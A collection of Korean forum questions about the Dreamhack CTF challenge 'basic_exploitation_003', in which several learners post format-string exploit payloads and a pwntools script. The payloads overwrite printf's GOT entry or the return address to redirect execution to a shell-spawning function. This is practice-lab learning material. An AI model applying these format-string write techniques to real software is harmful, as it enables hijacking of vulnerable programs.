basic_exploitation_003

https://dreamhack.io/board/beta-feedback/129 그림이 첨부가 안되서 피드백 쪽에다 남겼는데 답변이 달리지 않아 다시 이곳에 올립니다 제가 어떤 부분을 착각하고 있는건지 알려주시면 감사하겠습니다 ㅠㅠ

basic_exploitation_002 처럼 바꿀 값의 주소를 처음 스택에 입력하고 해당 주소에 %n을 이용해 값을 입력하는 풀이를 사용해보았는데 sprintf에서 seg fault가 납니다. sprintf함수 에서 segfault가 나는 이유가 스택으로 복사된 문자열 ex) AAAA%2050c.... => 414141412020202020202020.... 이 너무 길어서 그런거라고 대충이해했는데, 너무 큰 값을 스택영역으로 옮기다보니, 그 값이 스택영역을 벗어나는 경우가 생겨 세그폴트가 났다.. 라고 이해해도 될까요?? 문제는 해결하였지만 basic_exploitation_002와 같은 방법으로는 풀이가 왜 불가능한지 여쭤보고싶습니다.

문제를 푸는 것은 성공했으나 그 과정과 관련해서 질문을 올리고자 합니다. 처음에는 이전 문제와 비슷하겠지 하고 다음과 같이 짰었습니다. shell1 = 0x69 shell2 = 0x86 shell3 = 0x04 shell4 = 0x08 payload = p32(printf_got) payload += p32(printf_got + 1) payload += p32(printf_got + 2) payload += p32(printf_got + 3) payload += ('%{}c'.format(shell1 - 16)).encode() payload += b'%1$hhn' payload += ('%{}c'.format(shell2 - shell1)).encode() payload += b'%2$hhn' payload += ('%{}c'.format(0x100 + shell3 - shell2)).encode() payload += b'%3$hhn' payload += ('%{}c'.format(0x100 + shell4 - shell3)).encode() payload += b'%4$hhn' 이렇게 짜인 페이로드를 보내보니 EOF로 쉘이 터져서 고민하다가 어차피 상위 2바이트는 printf와 get_shell이 똑같으니 하위 2바이트만 덮으면 되겠구나 싶어서 다시 아래처럼 고쳐서 다시 시도해보니 제대로 동작했습니다. shell1 = 0x69 shell2 = 0x86 payload = p32(printf_got) payload += p32(printf_got + 1) payload += ('%{}c'.format(shell1 - 8)).encode() payload += b'%1$hhn' payload += ('%{}c'.format(shell2 - shell1)).encode() payload += b'%2$hhn' 뭔가 느껴지는 건 첫 번째에서는 stack_buf의 크기를 넘어가버려서 터진건가 싶은데 확신이 없어서 이게 맞는건지, 아니면 다른 이유가 있는건지 궁금합니다.

basic-exploitation-002 에도 동일한 증상이 있습니다. 도저히 모르겠네요. 로컬에서 Ubuntu 16.04, x86을 설치해서 거기서 직접 binary를 실행해서 페이로드를 주입하면 gdb 상에서도 return address 교체가 되는 걸 볼수가 있는데 get_shell에 가기 전에 seg fault 발생하면서 죽습니다. 동일한 페이로드를 dreamhack 서버에 전달하면 shell을 획득합니다. basic-exploitation-002도 flag는 획득은했는데 로컬에서하면 Seg Fault로 죽네요. 이유가 뭘까요? 참고로 ./basic-exploitation-003 < input.bin 이렇게 실행했고 xxd input.bin 으로 확인했을때도 페이로드 잘 들어가있습니다.

payload = b'%105c%7$hhn' + b'%29c%8$hhnAAA' + p32(print_got) + p32(print_got+1) payload = p32(print_got) + p32(print_got+1) + b'%97c%1$hhn' + b'%29c%2$hhn' (1번)포맷스트링 + 주소의 경우에는 seg fault가 발생하고 (2번)주소 + 포맷스트링의 경우에는 print_got의 하위 2바이트가 정상적으로 덮어씌워졌습니다. 왜 동일한 코드(제가 생각하기에는요)인데 결과가 다르게 나오는지 궁금합니다.

sprintf 함수로 버퍼를 채운 뒤 ret address를 덮어 씌우는 방식을 많이 사용하시는 것 같은데, 저는 fsb의 정석(?) 대로 printf 의 got을 덮어 씌우는 방법을 사용했습니다. 다만, 여기서 의문 사항이 몇 가지 있어 질문 드립니다. 전체적인 페이로드는 아래와 같이 작성했습니다. pay = b'AAAA' pay += p32(overwrite+2) pay += p32(overwrite+1) pay += p32(overwrite) pay += p32(overwrite+3) pay += b'%85c%4$hhn' pay += b'%29c%3$hhn' pay += b'%126c%2$hhn' pay += b'%4c%hhn' fsb는 첫 번째 %p부터 발생하는 것을 확인하였습니다. 하지만 실제로 값을 넣어보면 dummy 값 4 byte 이후부터 값이 들어가는 것을 보았습니다. 왜 이런 것인가요? 위의 페이로드에서 보듯이, 삽입하는 주소 값이 순서대로가 아닌 +3 -> 0 -> +1 -> +2 로 삽입하여야 제대로 값이 들어가는 것을 확인하였습니다. 1항과 연계되어 발생하는 문제인 것 같긴한데... 왜 그런지 모르겠습니다.

처음에는 "%1$hn" 2바이트 방식으로 접근해서 풀려고하는데 도저히 쉘을 획득할 수 없었기에 (제가 지식이 너무 짧아서...) "%1$hhn"으로 1바이트로 했더니 되었습니다..이유가 있나요?? 첫 번째 %hn 페이로드 : \x12\xa0\x04\x08\x10\xa0\x04\x08%2044c%1$hn%32357c%2$hn 두 번째 %hhn 페이로드 : \x10\xa0\x04\x08\x11\xa0\x04\x08%97c%1$hhn%29c%2$hhn

main의 ret값을 변조시키는건 안되는건가여?

풀이를 할 때, ` payload = "%p "*15 payload += p32(getshell) ` 이런식으로 작성하고 실행하니 쉘을 획득할 수 있었습니다. heap_buf의 크기는 0x80, stack_buf의 크기는 0x90이고 위의 페이로드에 작성한대로 실행하면 heap_buf에는 0xa0의 크기가 들어갑니다. 마찬가지로 stack_buf에도 0xa0의 크기가 들어가게되어 return 주소를 덮어 쓸 수 있는데 원인을 모르겠습니다...

ubuntu 16.04에 파이, 카나리 해제되어있는 문제입니다. #include <stdio.h> #include <stdlib.h> #include <signal.h> #include <unistd.h> void alarm_handler() { puts("TIME OUT"); exit(-1); } void initialize() { setvbuf(stdin, NULL, _IONBF, 0); setvbuf(stdout, NULL, _IONBF, 0); signal(SIGALRM, alarm_handler); alarm(30); } void get_shell() { system("/bin/sh"); } int main(int argc, char *argv[]) { char *heap_buf = (char *)malloc(0x80); char stack_buf[0x90] = {}; initialize(); read(0, heap_buf, 0x80); sprintf(stack_buf, heap_buf); printf("ECHO : %s\n", stack_buf); return 0; } 아래와 같이 익스 코드를 작성했습니다. from pwn import * context.arch = "i386" context.log_level = 'debug' get_shell_addr = 0x0804867b #134514299 printf_plt = 0x8048460 printf_got = 0x804a010 libc_start_main = 0xf7e1b647 p = remote("host3.dreamhack.games", 20584) p = remote("localhost",----) sleep(5) print(proc.pid_by_name("docker_basic_exploitation_003")) pause() fstring = p32(printf_got) fstring += p32(printf_got+1) fstring += p32(printf_got+3) fstring += b'%111x%6$n%1035c%7$n%2946c%8$n' #앞에 4바이트 포함 p.sendline(fstring) pause() p.interactive() 이에 다음과 같이 got overwriting을 성공한 걸 볼 수 있습니다 got overwriting si로 진입하면 get_shell로 흐름이 바뀝니다. image.png 하지만 system("/bin/sh")에서 터집니다. image.png 로컬 디버거뿐만 아니라 원격지에서도 터지는 것을 보니 exploit code에 문제가 있는 것 같은데 이유를 잘 모르겠습니다. 도와주시면 감사하겠습니다..!